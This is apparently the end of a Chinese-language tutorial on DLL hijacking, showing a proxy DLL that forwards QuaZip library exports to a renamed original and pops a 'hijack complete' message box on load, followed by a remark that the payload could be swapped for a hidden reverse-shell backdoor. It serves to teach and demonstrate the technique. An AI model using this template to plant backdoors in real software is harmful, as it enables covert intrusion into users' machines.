#pragma comment(linker,"/EXPORT:?isSequential@QuaZipFile@@UEBA_NXZ=quazip2.?isSequential@QuaZipFile@@UEBA_NXZ,@133")
#pragma comment(linker,"/EXPORT:?isZip64Enabled@QuaZip@@QEBA_NXZ=quazip2.?isZip64Enabled@QuaZip@@QEBA_NXZ,@134")
#pragma comment(linker,"/EXPORT:?metaObject@QuaGzipFile@@UEBAPEBUQMetaObject@@XZ=quazip2.?metaObject@QuaGzipFile@@UEBAPEBUQMetaObject@@XZ,@135")
#pragma comment(linker,"/EXPORT:?metaObject@QuaZIODevice@@UEBAPEBUQMetaObject@@XZ=quazip2.?metaObject@QuaZIODevice@@UEBAPEBUQMetaObject@@XZ,@136")
#pragma comment(linker,"/EXPORT:?metaObject@QuaZipFile@@UEBAPEBUQMetaObject@@XZ=quazip2.?metaObject@QuaZipFile@@UEBAPEBUQMetaObject@@XZ,@137")
#pragma comment(linker,"/EXPORT:?nameFilters@QuaZipDir@@QEBA?AVQStringList@@XZ=quazip2.?nameFilters@QuaZipDir@@QEBA?AVQStringList@@XZ,@138")
#pragma comment(linker,"/EXPORT:?open@QuaGzipFile@@UEAA_NHV?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z=quazip2.?open@QuaGzipFile@@UEAA_NHV?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z,@139")
#pragma comment(linker,"/EXPORT:?open@QuaGzipFile@@UEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z=quazip2.?open@QuaGzipFile@@UEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z,@140")
#pragma comment(linker,"/EXPORT:?open@QuaZIODevice@@UEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z=quazip2.?open@QuaZIODevice@@UEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z,@141")
#pragma comment(linker,"/EXPORT:?open@QuaZip@@QEAA_NW4Mode@1@PEAUzlib_filefunc_def_s@@@Z=quazip2.?open@QuaZip@@QEAA_NW4Mode@1@PEAUzlib_filefunc_def_s@@@Z,@142")
#pragma comment(linker,"/EXPORT:?open@QuaZipFile@@QEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@AEBUQuaZipNewInfo@@PEBDIHH_NHHH@Z=quazip2.?open@QuaZipFile@@QEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@AEBUQuaZipNewInfo@@PEBDIHH_NHHH@Z,@143")
#pragma comment(linker,"/EXPORT:?open@QuaZipFile@@QEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@PEAH1_NPEBD@Z=quazip2.?open@QuaZipFile@@QEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@PEAH1_NPEBD@Z,@144")
#pragma comment(linker,"/EXPORT:?open@QuaZipFile@@QEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@PEBD@Z=quazip2.?open@QuaZipFile@@QEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@PEBD@Z,@145")
#pragma comment(linker,"/EXPORT:?open@QuaZipFile@@UEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z=quazip2.?open@QuaZipFile@@UEAA_NV?$QFlags@W4OpenModeFlag@QIODevice@@@@@Z,@146")
#pragma comment(linker,"/EXPORT:?path@QuaZipDir@@QEBA?AVQString@@XZ=quazip2.?path@QuaZipDir@@QEBA?AVQString@@XZ,@147")
#pragma comment(linker,"/EXPORT:?pos@QuaZipFile@@UEBA_JXZ=quazip2.?pos@QuaZipFile@@UEBA_JXZ,@148")
#pragma comment(linker,"/EXPORT:?qt_metacall@QuaGzipFile@@UEAAHW4Call@QMetaObject@@HPEAPEAX@Z=quazip2.?qt_metacall@QuaGzipFile@@UEAAHW4Call@QMetaObject@@HPEAPEAX@Z,@149")
#pragma comment(linker,"/EXPORT:?qt_metacall@QuaZIODevice@@UEAAHW4Call@QMetaObject@@HPEAPEAX@Z=quazip2.?qt_metacall@QuaZIODevice@@UEAAHW4Call@QMetaObject@@HPEAPEAX@Z,@150")
#pragma comment(linker,"/EXPORT:?qt_metacall@QuaZipFile@@UEAAHW4Call@QMetaObject@@HPEAPEAX@Z=quazip2.?qt_metacall@QuaZipFile@@UEAAHW4Call@QMetaObject@@HPEAPEAX@Z,@151")
#pragma comment(linker,"/EXPORT:?qt_metacast@QuaGzipFile@@UEAAPEAXPEBD@Z=quazip2.?qt_metacast@QuaGzipFile@@UEAAPEAXPEBD@Z,@152")
#pragma comment(linker,"/EXPORT:?qt_metacast@QuaZIODevice@@UEAAPEAXPEBD@Z=quazip2.?qt_metacast@QuaZIODevice@@UEAAPEAXPEBD@Z,@153")
#pragma comment(linker,"/EXPORT:?qt_metacast@QuaZipFile@@UEAAPEAXPEBD@Z=quazip2.?qt_metacast@QuaZipFile@@UEAAPEAXPEBD@Z,@154")
#pragma comment(linker,"/EXPORT:?qt_static_metacall@QuaGzipFile@@CAXPEAVQObject@@W4Call@QMetaObject@@HPEAPEAX@Z=quazip2.?qt_static_metacall@QuaGzipFile@@CAXPEAVQObject@@W4Call@QMetaObject@@HPEAPEAX@Z,@155")
#pragma comment(linker,"/EXPORT:?qt_static_metacall@QuaZIODevice@@CAXPEAVQObject@@W4Call@QMetaObject@@HPEAPEAX@Z=quazip2.?qt_static_metacall@QuaZIODevice@@CAXPEAVQObject@@W4Call@QMetaObject@@HPEAPEAX@Z,@156")
#pragma comment(linker,"/EXPORT:?qt_static_metacall@QuaZipFile@@CAXPEAVQObject@@W4Call@QMetaObject@@HPEAPEAX@Z=quazip2.?qt_static_metacall@QuaZipFile@@CAXPEAVQObject@@W4Call@QMetaObject@@HPEAPEAX@Z,@157")
#pragma comment(linker,"/EXPORT:?readData@QuaGzipFile@@MEAA_JPEAD_J@Z=quazip2.?readData@QuaGzipFile@@MEAA_JPEAD_J@Z,@158")
#pragma comment(linker,"/EXPORT:?readData@QuaZIODevice@@MEAA_JPEAD_J@Z=quazip2.?readData@QuaZIODevice@@MEAA_JPEAD_J@Z,@159")
#pragma comment(linker,"/EXPORT:?readData@QuaZipFile@@MEAA_JPEAD_J@Z=quazip2.?readData@QuaZipFile@@MEAA_JPEAD_J@Z,@160")
#pragma comment(linker,"/EXPORT:?relativeFilePath@QuaZipDir@@QEBA?AVQString@@AEBV2@@Z=quazip2.?relativeFilePath@QuaZipDir@@QEBA?AVQString@@AEBV2@@Z,@161")
#pragma comment(linker,"/EXPORT:?removeFile@JlCompress@@CA_NVQStringList@@@Z=quazip2.?removeFile@JlCompress@@CA_NVQStringList@@@Z,@162")
#pragma comment(linker,"/EXPORT:?reset@QuaAdler32@@UEAAXXZ=quazip2.?reset@QuaAdler32@@UEAAXXZ,@163")
#pragma comment(linker,"/EXPORT:?reset@QuaCrc32@@UEAAXXZ=quazip2.?reset@QuaCrc32@@UEAAXXZ,@164")
#pragma comment(linker,"/EXPORT:?setAutoClose@QuaZip@@QEBAX_N@Z=quazip2.?setAutoClose@QuaZip@@QEBAX_N@Z,@165")
#pragma comment(linker,"/EXPORT:?setCaseSensitivity@QuaZipDir@@QEAAXW4CaseSensitivity@QuaZip@@@Z=quazip2.?setCaseSensitivity@QuaZipDir@@QEAAXW4CaseSensitivity@QuaZip@@@Z,@166")
#pragma comment(linker,"/EXPORT:?setComment@QuaZip@@QEAAXAEBVQString@@@Z=quazip2.?setComment@QuaZip@@QEAAXAEBVQString@@@Z,@167")
#pragma comment(linker,"/EXPORT:?setCommentCodec@QuaZip@@QEAAXPEAVQTextCodec@@@Z=quazip2.?setCommentCodec@QuaZip@@QEAAXPEAVQTextCodec@@@Z,@168")
#pragma comment(linker,"/EXPORT:?setCommentCodec@QuaZip@@QEAAXPEBD@Z=quazip2.?setCommentCodec@QuaZip@@QEAAXPEBD@Z,@169")
#pragma comment(linker,"/EXPORT:?setCurrentFile@QuaZip@@QEAA_NAEBVQString@@W4CaseSensitivity@1@@Z=quazip2.?setCurrentFile@QuaZip@@QEAA_NAEBVQString@@W4CaseSensitivity@1@@Z,@170")
#pragma comment(linker,"/EXPORT:?setDataDescriptorWritingEnabled@QuaZip@@QEAAX_N@Z=quazip2.?setDataDescriptorWritingEnabled@QuaZip@@QEAAX_N@Z,@171")
#pragma comment(linker,"/EXPORT:?setDefaultFileNameCodec@QuaZip@@SAXPEAVQTextCodec@@@Z=quazip2.?setDefaultFileNameCodec@QuaZip@@SAXPEAVQTextCodec@@@Z,@172")
#pragma comment(linker,"/EXPORT:?setDefaultFileNameCodec@QuaZip@@SAXPEBD@Z=quazip2.?setDefaultFileNameCodec@QuaZip@@SAXPEBD@Z,@173")
#pragma comment(linker,"/EXPORT:?setFileDateTime@QuaZipNewInfo@@QEAAXAEBVQString@@@Z=quazip2.?setFileDateTime@QuaZipNewInfo@@QEAAXAEBVQString@@@Z,@174")
#pragma comment(linker,"/EXPORT:?setFileNTFSTimes@QuaZipNewInfo@@QEAAXAEBVQString@@@Z=quazip2.?setFileNTFSTimes@QuaZipNewInfo@@QEAAXAEBVQString@@@Z,@175")
#pragma comment(linker,"/EXPORT:?setFileNTFSaTime@QuaZipNewInfo@@QEAAXAEBVQDateTime@@H@Z=quazip2.?setFileNTFSaTime@QuaZipNewInfo@@QEAAXAEBVQDateTime@@H@Z,@176")
#pragma comment(linker,"/EXPORT:?setFileNTFScTime@QuaZipNewInfo@@QEAAXAEBVQDateTime@@H@Z=quazip2.?setFileNTFScTime@QuaZipNewInfo@@QEAAXAEBVQDateTime@@H@Z,@177")
#pragma comment(linker,"/EXPORT:?setFileNTFSmTime@QuaZipNewInfo@@QEAAXAEBVQDateTime@@H@Z=quazip2.?setFileNTFSmTime@QuaZipNewInfo@@QEAAXAEBVQDateTime@@H@Z,@178")
#pragma comment(linker,"/EXPORT:?setFileName@QuaGzipFile@@QEAAXAEBVQString@@@Z=quazip2.?setFileName@QuaGzipFile@@QEAAXAEBVQString@@@Z,@179")
#pragma comment(linker,"/EXPORT:?setFileName@QuaZipFile@@QEAAXAEBVQString@@W4CaseSensitivity@QuaZip@@@Z=quazip2.?setFileName@QuaZipFile@@QEAAXAEBVQString@@W4CaseSensitivity@QuaZip@@@Z,@180")
#pragma comment(linker,"/EXPORT:?setFileNameCodec@QuaZip@@QEAAXPEAVQTextCodec@@@Z=quazip2.?setFileNameCodec@QuaZip@@QEAAXPEAVQTextCodec@@@Z,@181")
#pragma comment(linker,"/EXPORT:?setFileNameCodec@QuaZip@@QEAAXPEBD@Z=quazip2.?setFileNameCodec@QuaZip@@QEAAXPEBD@Z,@182")
#pragma comment(linker,"/EXPORT:?setFilePermissions@QuaZipNewInfo@@QEAAXAEBVQString@@@Z=quazip2.?setFilePermissions@QuaZipNewInfo@@QEAAXAEBVQString@@@Z,@183")
#pragma comment(linker,"/EXPORT:?setFilter@QuaZipDir@@QEAAXV?$QFlags@W4Filter@QDir@@@@@Z=quazip2.?setFilter@QuaZipDir@@QEAAXV?$QFlags@W4Filter@QDir@@@@@Z,@184")
#pragma comment(linker,"/EXPORT:?setIoDevice@QuaZip@@QEAAXPEAVQIODevice@@@Z=quazip2.?setIoDevice@QuaZip@@QEAAXPEAVQIODevice@@@Z,@185")
#pragma comment(linker,"/EXPORT:?setNameFilters@QuaZipDir@@QEAAXAEBVQStringList@@@Z=quazip2.?setNameFilters@QuaZipDir@@QEAAXAEBVQStringList@@@Z,@186")
#pragma comment(linker,"/EXPORT:?setPath@QuaZipDir@@QEAAXAEBVQString@@@Z=quazip2.?setPath@QuaZipDir@@QEAAXAEBVQString@@@Z,@187")
#pragma comment(linker,"/EXPORT:?setPermissions@QuaZipNewInfo@@QEAAXV?$QFlags@W4Permission@QFileDevice@@@@@Z=quazip2.?setPermissions@QuaZipNewInfo@@QEAAXV?$QFlags@W4Permission@QFileDevice@@@@@Z,@188")
#pragma comment(linker,"/EXPORT:?setSorting@QuaZipDir@@QEAAXV?$QFlags@W4SortFlag@QDir@@@@@Z=quazip2.?setSorting@QuaZipDir@@QEAAXV?$QFlags@W4SortFlag@QDir@@@@@Z,@189")
#pragma comment(linker,"/EXPORT:?setZip64Enabled@QuaZip@@QEAAX_N@Z=quazip2.?setZip64Enabled@QuaZip@@QEAAX_N@Z,@190")
#pragma comment(linker,"/EXPORT:?setZip@QuaZipFile@@QEAAXPEAVQuaZip@@@Z=quazip2.?setZip@QuaZipFile@@QEAAXPEAVQuaZip@@@Z,@191")
#pragma comment(linker,"/EXPORT:?setZipName@QuaZip@@QEAAXAEBVQString@@@Z=quazip2.?setZipName@QuaZip@@QEAAXAEBVQString@@@Z,@192")
#pragma comment(linker,"/EXPORT:?setZipName@QuaZipFile@@QEAAXAEBVQString@@@Z=quazip2.?setZipName@QuaZipFile@@QEAAXAEBVQString@@@Z,@193")
#pragma comment(linker,"/EXPORT:?size@QuaZipFile@@UEBA_JXZ=quazip2.?size@QuaZipFile@@UEBA_JXZ,@194")
#pragma comment(linker,"/EXPORT:?sorting@QuaZipDir@@QEBA?AV?$QFlags@W4SortFlag@QDir@@@@XZ=quazip2.?sorting@QuaZipDir@@QEBA?AV?$QFlags@W4SortFlag@QDir@@@@XZ,@195")
#pragma comment(linker,"/EXPORT:?staticMetaObject@QuaGzipFile@@2UQMetaObject@@B=quazip2.?staticMetaObject@QuaGzipFile@@2UQMetaObject@@B,@196")
#pragma comment(linker,"/EXPORT:?staticMetaObject@QuaZIODevice@@2UQMetaObject@@B=quazip2.?staticMetaObject@QuaZIODevice@@2UQMetaObject@@B,@197")
#pragma comment(linker,"/EXPORT:?staticMetaObject@QuaZipFile@@2UQMetaObject@@B=quazip2.?staticMetaObject@QuaZipFile@@2UQMetaObject@@B,@198")
#pragma comment(linker,"/EXPORT:?toQuaZipFileInfo@QuaZipFileInfo64@@QEBA_NAEAUQuaZipFileInfo@@@Z=quazip2.?toQuaZipFileInfo@QuaZipFileInfo64@@QEBA_NAEAUQuaZipFileInfo@@@Z,@199")
#pragma comment(linker,"/EXPORT:?tr@QuaGzipFile@@SA?AVQString@@PEBD0H@Z=quazip2.?tr@QuaGzipFile@@SA?AVQString@@PEBD0H@Z,@200")
#pragma comment(linker,"/EXPORT:?tr@QuaZIODevice@@SA?AVQString@@PEBD0H@Z=quazip2.?tr@QuaZIODevice@@SA?AVQString@@PEBD0H@Z,@201")
#pragma comment(linker,"/EXPORT:?tr@QuaZipFile@@SA?AVQString@@PEBD0H@Z=quazip2.?tr@QuaZipFile@@SA?AVQString@@PEBD0H@Z,@202")
#pragma comment(linker,"/EXPORT:?trUtf8@QuaGzipFile@@SA?AVQString@@PEBD0H@Z=quazip2.?trUtf8@QuaGzipFile@@SA?AVQString@@PEBD0H@Z,@203")
#pragma comment(linker,"/EXPORT:?trUtf8@QuaZIODevice@@SA?AVQString@@PEBD0H@Z=quazip2.?trUtf8@QuaZIODevice@@SA?AVQString@@PEBD0H@Z,@204")
#pragma comment(linker,"/EXPORT:?trUtf8@QuaZipFile@@SA?AVQString@@PEBD0H@Z=quazip2.?trUtf8@QuaZipFile@@SA?AVQString@@PEBD0H@Z,@205")
#pragma comment(linker,"/EXPORT:?update@QuaAdler32@@UEAAXAEBVQByteArray@@@Z=quazip2.?update@QuaAdler32@@UEAAXAEBVQByteArray@@@Z,@206")
#pragma comment(linker,"/EXPORT:?update@QuaCrc32@@UEAAXAEBVQByteArray@@@Z=quazip2.?update@QuaCrc32@@UEAAXAEBVQByteArray@@@Z,@207")
#pragma comment(linker,"/EXPORT:?usize@QuaZipFile@@QEBA_JXZ=quazip2.?usize@QuaZipFile@@QEBA_JXZ,@208")
#pragma comment(linker,"/EXPORT:?value@QuaAdler32@@UEAAIXZ=quazip2.?value@QuaAdler32@@UEAAIXZ,@209")
#pragma comment(linker,"/EXPORT:?value@QuaCrc32@@UEAAIXZ=quazip2.?value@QuaCrc32@@UEAAIXZ,@210")
#pragma comment(linker,"/EXPORT:?writeData@QuaGzipFile@@MEAA_JPEBD_J@Z=quazip2.?writeData@QuaGzipFile@@MEAA_JPEBD_J@Z,@211")
#pragma comment(linker,"/EXPORT:?writeData@QuaZIODevice@@MEAA_JPEBD_J@Z=quazip2.?writeData@QuaZIODevice@@MEAA_JPEBD_J@Z,@212")
#pragma comment(linker,"/EXPORT:?writeData@QuaZipFile@@MEAA_JPEBD_J@Z=quazip2.?writeData@QuaZipFile@@MEAA_JPEBD_J@Z,@213")

BOOL APIENTRY DllMain
(
	HMODULE hModule,
	DWORD urfc,
	LPVOID lpReserved
)
{
	switch (urfc)
	{
	case DLL_PROCESS_ATTACH:
		MessageBox(NULL, LPCSTR("劫持完成"), LPCSTR("Hijack"), MB_OK);
		break;
	case DLL_PROCESS_DETACH:
		break;
	case DLL_THREAD_ATTACH:
		break;
	case DLL_THREAD_DETACH:
		break;
	default:
		break;
	}
	return TRUE;
}

編譯時要注意程序到底是x86還是x64的，位數不一樣可能會導致dll庫無法被加載
效果圖
運行程序後先彈出
然後程序正常運行

如果我們將DLL_PROCESS_ATTACH下的代碼改成創建一個新線程，並開啓一個管道開啓socket通訊執行反彈shell就能很好的隱藏運行這個後門。

dll劫持代碼演示

DLL文件

DLL劫持

Hibernate入門基礎（三）

SHA-1算法解釋與C/C++實現

dll劫持代碼演示

MD5算法解釋及C/C++實現

Mac下配置sublime實現LaTeX

https://yachay.unat.edu.pe/blog/index.php?comment_area=format_blog&comment_component=blog&comment_co

linux以太網驅動總結